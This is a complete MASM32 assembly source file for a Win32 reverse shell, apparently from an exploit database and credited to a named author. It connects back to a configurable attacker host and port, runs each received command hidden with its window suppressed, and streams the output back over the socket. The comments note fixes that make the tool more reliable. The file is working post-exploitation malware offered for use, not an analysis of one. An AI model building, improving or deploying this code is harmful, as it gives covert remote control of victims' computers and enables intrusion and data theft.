###########################

# Win32 x86 Reverse Shell (MASM32) — a connect-back payload that runs each received command line hidden and returns its output over the socket; it is a post-exploitation tool, not a vulnerability in itself

###########################

.586                    ; 32-bit code, 80586 instruction set
.model flat,stdcall     ; flat 32-bit memory model; procedures default to stdcall, the Win32 API convention
option casemap:none     ; identifiers are case-sensitive
 
include /masm32/include/windows.inc
include /masm32/include/masm32.inc
include /masm32/include/gdi32.inc
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
include /masm32/include/wsock32.inc

includelib /masm32/lib/masm32.lib
includelib /masm32/lib/gdi32.lib
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
includelib /masm32/lib/masm32.lib
includelib /masm32/lib/wsock32.lib

.const
MEMSIZE equ 65535       ; byte size of the heap block (64 KiB - 1) requested from GlobalAlloc for a command's output

.data
; ANSI, NUL-terminated strings. The err* texts are shown in a message box by show_error/show_error_1.
AppName     db "Reverse Shell | Andrea Sindoni @invictus1306",0  ; banner only; not referenced by the code in this file

err0        db "An error occured while calling WSAStartup",0
err1        db "An error occured while creating a socket",0
err2        db "An error occured while connecting",0
err3        db "An error occured while calling gethostbyname",0
err4        db "An error occured while calling connect/recv",0
err5        db "An error occured while calling CreatePipe",0
err6        db "An error occured while calling GlobalAlloc/Free-GlobalLock/Unlock",0
err7        db "An error occured while calling CreateProcess",0
capt        db "Information",0   ; message-box caption
hostname    db "192.168.1.86",0 ; change it with your address: connect-back host, resolved with gethostbyname
port        dd 4444 ; change port number: connect-back TCP port in host order (main converts it with htons)

; Incoming command line. recv is limited to 1000 bytes and the buffer is zeroed before each
; receive, so byte 1001 is always a NUL terminator for the string handed to CreateProcess.
recbuf byte 1001 dup (0)
 
.data?
; Uninitialized globals shared by main and the error helpers.

sock            dd ?        ; the TCP socket connected back to hostname:port
ErrorCode       dd ?        ; last WSAGetLastError/GetLastError value captured by show_error/show_error_1 (stored, never displayed)
pipe_read       dd ?        ; parent's read end of the child's output pipe
pipe_write      dd ?        ; write end of the pipe, handed to the child as stdout/stderr
size_to_send    dd ?        ; byte count passed to send()
bwr             dd ?        ; bytes read by the last ReadFile
stored_buffer   dd ?        ; pointer returned by GlobalLock(hMemory)
wsadata WSADATA <>          ; filled in by WSAStartup
sin sockaddr_in <?>         ; connect-back address (family, port, IPv4 address)
security_attrib SECURITY_ATTRIBUTES <>   ; passed to CreatePipe to make the handles inheritable
stinfo STARTUPINFO <>       ; child's std-handle redirection and hidden window
pinfo PROCESS_INFORMATION <>; process/thread handles and ids of the spawned child
buffer db 1024 dup(?)       ; staging buffer for one ReadFile chunk of child output
hMemory HANDLE ?            ; GlobalAlloc handle of the block that accumulates the output

 
.code

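;-----------------------------------------------------------------------
; show_error(caption, err_txt)
; Report a Winsock failure: stores WSAGetLastError() in the global ErrorCode
; (kept for a debugger; it is not displayed) and shows err_txt in a message
; box titled caption. Both arguments point to NUL-terminated ANSI strings.
; stdcall; clobbers eax, ecx, edx. Return value is not used by callers.
;-----------------------------------------------------------------------
show_error proc caption:ptr byte, err_txt:ptr byte
    invoke WSAGetLastError
    mov ErrorCode, eax
    ; MessageBoxA(hWnd, lpText, lpCaption, uType). The original passed MB_OK in the
    ; hWnd slot and 0 as uType; that only worked because MB_OK is 0. Put each
    ; argument in its proper slot so a later change of style does not break it.
    invoke MessageBoxA, NULL, err_txt, caption, MB_OK
    ret
show_error endp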

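;-----------------------------------------------------------------------
; show_error_1(caption, err_txt)
; Report a non-Winsock (kernel32) failure: stores GetLastError() in the global
; ErrorCode (kept for a debugger; it is not displayed) and shows err_txt in a
; message box titled caption. Both arguments point to NUL-terminated ANSI strings.
; stdcall; clobbers eax, ecx, edx. Return value is not used by callers.
;-----------------------------------------------------------------------
show_error_1 proc caption:ptr byte, err_txt:ptr byte
    invoke GetLastError
    mov ErrorCode, eax
    ; MessageBoxA(hWnd, lpText, lpCaption, uType): NULL owner window, MB_OK style.
    ; (The original had MB_OK in the hWnd slot and 0 as uType, which only worked
    ; because MB_OK is 0.)
    invoke MessageBoxA, NULL, err_txt, caption, MB_OK
    ret
show_error_1 endp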

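;-----------------------------------------------------------------------
; main — program entry point (see END main). Never returns; ends in ExitProcess.
; Connects back to hostname:port over TCP, then loops: receive one command
; line, run it hidden with stdout/stderr redirected into an anonymous pipe,
; and relay everything it writes back over the socket. Leaves quietly when
; the peer closes the connection; any API failure is reported with a message
; box via show_error/show_error_1 and ends the program.
; Globals used: sock, sin, wsadata, recbuf, buffer, bwr, pipe_read,
; pipe_write, security_attrib, stinfo, pinfo.
;
; Fixes relative to the original:
;  - child output was appended with lstrcat from a 1024-byte buffer that is
;    not NUL-terminated when full, into a fixed 65535-byte heap block with no
;    bound check, and the byte count sent was (ReadFile calls mod 256) * 1024,
;    i.e. a heap overflow for large output and an over-read of heap memory
;    on the wire; output is now streamed chunk by chunk with the real length.
;  - CreateProcess's result was tested with flags left over from CloseHandle.
;  - pipe_read, pinfo.hThread and pinfo.hProcess leaked on every command.
;  - the read end of the pipe was inheritable too.
;  - closesocket failure at exit jumped into an error handler that jumped back
;    to exit: an early failure (no socket yet) showed message boxes forever.
;  - recv returning 0 (peer closed) now exits instead of spawning "".
;-----------------------------------------------------------------------
main proc

    mov sock, INVALID_SOCKET                    ; lets the exit path tell whether a socket exists

    invoke WSAStartup, 101h, addr wsadata       ; Winsock 1.1 is enough for the wsock32 calls used here
    test eax, eax
    jnz @error_wsa_startup

    invoke socket, AF_INET, SOCK_STREAM, 0      ; TCP stream socket
    cmp eax, INVALID_SOCKET
    je @error_socket_creation
    mov sock, eax

    ; Build the connect-back address: family, port in network byte order, IPv4 address.
    mov sin.sin_family, AF_INET
    invoke htons, port
    mov sin.sin_port, ax
    invoke gethostbyname, addr hostname
    test eax, eax
    jz @error_gethostbyname
    ; hostent layout: h_name(4) h_aliases(4) h_addrtype(2) h_length(2) h_addr_list(4),
    ; so h_addr_list sits at offset 12; take the first address it points to.
    mov eax, [eax+12]
    mov eax, [eax]
    mov eax, [eax]
    mov sin.sin_addr, eax

    invoke connect, sock, addr sin, sizeof sin
    cmp eax, SOCKET_ERROR
    je @error_socket_error

    @@receive_data_loop:
    ; Receive at most sizeof recbuf - 1 bytes into a freshly zeroed buffer, so the
    ; command line handed to CreateProcess is always NUL-terminated.
    invoke RtlZeroMemory, addr recbuf, sizeof recbuf
    invoke recv, sock, addr recbuf, (sizeof recbuf) - 1, 0
    cmp eax, SOCKET_ERROR
    je @error_socket_error
    test eax, eax
    jz exit                                     ; 0 bytes = peer closed the connection: leave quietly

    ; Strip trailing CR/LF (line-oriented clients such as netcat send them) so they do
    ; not end up on the child's command line. ecx = bytes that remain.
    mov ecx, eax
    trim_eol:
    mov al, recbuf[ecx-1]
    cmp al, 0Dh
    je trim_one
    cmp al, 0Ah
    jne trim_done
    trim_one:
    mov recbuf[ecx-1], 0
    dec ecx
    jnz trim_eol
    trim_done:
    test ecx, ecx
    jz @@receive_data_loop                      ; blank line: nothing to run, wait for the next command

    ; Anonymous pipe: the child writes stdout/stderr into pipe_write, we read pipe_read.
    mov security_attrib.nLength, sizeof SECURITY_ATTRIBUTES
    mov security_attrib.lpSecurityDescriptor, NULL
    mov security_attrib.bInheritHandle, TRUE
    invoke CreatePipe, addr pipe_read, addr pipe_write, addr security_attrib, 0
    test eax, eax
    jz @error_creation_pipe
    ; Only the write end may be inherited. If the child (or anything it spawns) also held
    ; the read end, the pipe could never reach end-of-file and ReadFile below would block.
    invoke SetHandleInformation, pipe_read, HANDLE_FLAG_INHERIT, 0

    invoke RtlZeroMemory, addr stinfo, sizeof STARTUPINFO
    invoke RtlZeroMemory, addr pinfo, sizeof PROCESS_INFORMATION
    mov stinfo.cb, sizeof STARTUPINFO
    mov eax, pipe_write
    mov stinfo.hStdOutput, eax
    mov stinfo.hStdError, eax
    ; hStdInput stays NULL: the child gets no usable stdin, which is fine for "cmd.exe /c ..." commands.
    mov stinfo.dwFlags, STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
    mov stinfo.wShowWindow, SW_HIDE

    ; The received text is the complete command line (e.g. "cmd.exe /c dir"); no interpreter
    ; is prepended, so a bare "dir" fails. bInheritHandles=TRUE passes the pipe's write end along.
    invoke CreateProcess, NULL, addr recbuf, NULL, NULL, TRUE, 0, NULL, NULL, addr stinfo, addr pinfo
    push eax                                    ; keep the result: CloseHandle clobbers eax and the flags
    ; Drop our copy of the write end right away; while we hold it the pipe can never reach end-of-file.
    invoke CloseHandle, pipe_write
    pop eax
    test eax, eax
    jnz relay_loop
    invoke CloseHandle, pipe_read               ; do not leak the read end on the failure path
    jmp @error_create_process

    ; Forward the child's output as it arrives. No intermediate heap buffer, so the output
    ; may be any size and may contain NUL bytes. As in the original, the loop ends when
    ; ReadFile fails, which happens once every write handle to the pipe has been closed
    ; (the child and anything it started have exited).
    relay_loop:
    invoke ReadFile, pipe_read, addr buffer, sizeof buffer, addr bwr, NULL
    test eax, eax
    jz relay_done
    cmp bwr, 0
    je relay_done
    invoke send, sock, addr buffer, bwr, 0
    cmp eax, SOCKET_ERROR
    je @error_connection
    jmp relay_loop

    relay_done:
    ; Release the per-command handles; the original leaked all three on every command.
    invoke CloseHandle, pipe_read
    invoke CloseHandle, pinfo.hThread
    invoke CloseHandle, pinfo.hProcess
    jmp @@receive_data_loop

    exit:
    ; Plain teardown: never branch on closesocket's result here. The original jumped into an
    ; error handler that came straight back to exit, so an early failure (no socket yet)
    ; produced an endless stream of message boxes.
    cmp sock, INVALID_SOCKET
    je skip_close
    invoke closesocket, sock
    skip_close:
    invoke WSACleanup
    invoke ExitProcess, 0

    ; Error reporting: show_error reads WSAGetLastError, show_error_1 reads GetLastError.
    @error_wsa_startup:
    invoke show_error, offset capt, offset err0
    jmp exit

    @error_socket_creation:
    invoke show_error, offset capt, offset err1
    jmp exit

    @error_connection:                          ; send() failed (err2's text still says "connecting")
    invoke show_error, offset capt, offset err2
    jmp exit

    @error_gethostbyname:
    invoke show_error, offset capt, offset err3
    jmp exit

    @error_socket_error:                        ; connect() or recv() failed
    invoke show_error, offset capt, offset err4
    jmp exit

    @error_creation_pipe:
    invoke show_error, offset capt, offset err5
    jmp exit

    @error_create_process:
    invoke show_error_1, offset capt, offset err7
    jmp exit

main endp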

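end main                ; entry point is main; the assembler stops reading at the first END
                        ; (the original's stray "end start" that followed referenced a label
                        ; that does not exist in this file and was dead text)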

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-03-08]

###########################